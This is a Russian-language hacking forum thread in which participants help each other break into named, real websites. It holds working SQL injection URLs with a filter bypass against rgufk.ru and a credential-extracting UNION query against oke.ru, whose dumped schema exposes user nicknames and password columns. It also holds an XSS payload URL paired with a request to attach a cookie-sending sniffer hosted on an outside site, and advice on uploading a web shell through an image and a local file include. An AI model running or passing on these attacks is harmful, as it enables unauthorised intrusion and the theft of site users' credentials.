действительно что то я подзагнался )))) мож у кого еще есть какие-нить варианты???

sedoy_xxx, имхо ничего нельзя сделать

Файл сохранить с другим расширением не можешь?

sedoy_xxx iframe/redirect

Piflit, он спрашивал как шелл залить, если я не ошибаюсь)

пипл помогите сюда вставить снифер + отсылку кукисов, скоко непробывал невыходит...
_http://onlinekz.net.ru/engine/modules/imagepreview.php?image=javascript:alert('[XSS]');
пробывал снифиром http://na-s.ru , логов напостой нету =(

при скл иньекции когда нету вывода и нету прав на into outfile есть ли ещё способ получить то что там записано?

Doom123
подзапросы(посимвольный перебор)

delete

не пойдёт... там же нету вывода на экран результата ... там идёт так...

1 запрос с этим параметром и 2ой запрос

в первом запросе яя подобралк количество полей! но во 2ой это количество не подходит и происходит выполнение вункции die(); с ошибкой mysql

не пойдёт... там же нету вывода на экран результата ... там идёт так...

1 запрос с этим параметром и 2ой запрос

в первом запросе яя подобралк количество полей! но во 2ой это количество не подходит и происходит выполнение вункции die(); с ошибкой mysqlТы представляешь, что такое подзапросы с посимвольным перебором?
Для них не нужен вывод. Это своего рода true/false.
Условие верно-страница вылезла,не верно-ошибка
Твой случай ,если я понял правильно, именно подзапросами и выводится(Да, гиммороя побольше чем с нормальным выводом, но по другому никак)

там под сотню юзеров :), каждый юзер - это походу "сайт"?
Да.
Вот, вот этот хостинг http://www.valuehost.ru/

http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+union+select+1,2,3,4,5,6,7,8,9,10/*
Вот что с этим можно сделать?ТАм что то фильтруется ... .

Buffalon
Фильтр слабенький, вот обход:
http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+and+1=2+union+select+1,2,version(),4,5,u ser(),7,8,9,10

вопрос.
есть загрузка файлов/картинок
при загрузке меняется только название и расширение файла на жпг. содержимое не меняется
как залить шелл и возможно ли?

Бармалей, если у тебя будет локальный инклуд, то будет и шелл. заливаешь картинку с содержимым шелла, потом инклудишь...

нету там инклуда(

Вот проблемка
Нашел Sql раскрутил и вот http://www.oke.ru/xo4u.php?id=-42708+UNION+SELECT+1,2,concat_ws(0x3a,nick,passw), 4,5,6,7,8,9,10+FROM+chausers/* но ниче не выводит
Таблицы
COLLATIONS.
COLLATION_CHARACTER_ SET_APPLICABILITY.
COLUMNS.
COLUMN_PRIVILEGES.
ENGINES.
EVENTS.
FILES.
GLOBAL_STATUS.
GLOBAL_VARIABLES.
KEY_COLUMN_USAGE.
PARTITIONS.
PLUGINS.
PROCESSLIST.
REFERENTIAL_CONSTRAI NTS.
ROUTINES.
SCHEMATA.
SCHEMA_PRIVILEGES.
SESSION_STATUS.
SESSION_VARIABLES.
STATISTICS.
TABLES.
TABLE_CONSTRAINTS.
TABLE_PRIVILEGES.
TRIGGERS.
USER_PRIVILEGES.
VIEWS.
chamess.
chamess_old1.
charooms.
chausers.
mess.
wants.

Колонки в chausers
idate
nick
email
chalogid
lastdate
roomid
passw